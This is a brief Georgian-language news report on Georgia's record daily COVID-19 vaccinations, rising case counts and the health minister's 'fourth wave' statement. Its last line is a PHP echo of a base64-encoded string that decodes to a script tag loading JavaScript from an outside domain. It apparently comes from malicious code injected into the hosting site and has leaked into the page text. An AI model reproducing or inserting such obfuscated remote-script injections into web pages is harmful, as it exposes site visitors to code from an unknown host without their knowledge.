celsiusi
ავერსი საქკაბელი
სტატისტიკის მიხედვით, გუშინ საქართველოში 13,884 ვაქცინაცია ჩატარდა, რაც ჯერჯერობით ერთ დღეში აცრილთა რეკორდული რაოდენობაა. შედეგად, ორჯერადად აცრილთა რაოდენობა 142 254 გახდა (მოსახლეობის 3.8%), ხოლო ერთი დოზით აცრილია 276,144 ადამიანი. იმისთვის, რათა წლის ბოლომდე ზრდასრული მოსახლეობის 60% აიცრას ყოველდღიურად 19,000 ვაქცინაცია უნდა კეთდებოდეს. 
 
დღესვე კორონავირუსის ახალი შემთხვევების 2021 წლის პიკი დაფიქსირდა - გამოვლინდა 3,666 ახალი შემთხვევა, რაც 2020 წლის 14 დეკემბრის შემდეგ ერთ დღეში ინფიცირების მაქსიმალური მაჩვენებელია. ასევე მკვეთრად არის გაზრდილი ახალი შემთხვევების 7-დღიანი საშუალო და ისიც გასული წლის დეკემბრის შემდეგ პიკურ მაჩვენებელზეა. 
 
საქართველოს მთავრობა არსებულ ეპიდემიურ ვითარებას "მეოთხე ტალღას" უწოდებს. 
 
"ჩვენ შეგვიძლია უკვე ვთქვათ, რომ ეს არის მეოთხე ტალღა. ამასთან დაკავშირებით სრული მობილიზაცია უკვე დაწყებული არის ჯანდაცვის სექტორიში. კიდევ ერთხელ ვთხოვთ ჩვენს მოქალაქეებს, რომ გაუფრთხილდნენ საკუთარ თავს და საკუთარ გარემოცვას, ატარონ პირბადე და აქტიურად ჩაერთონ ვაქცინაციის პროცესში,"- განაცხადა ჯანდაცვის მინისტრმა ეკატერინე ტიკარაძემ.
 
 
1279
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");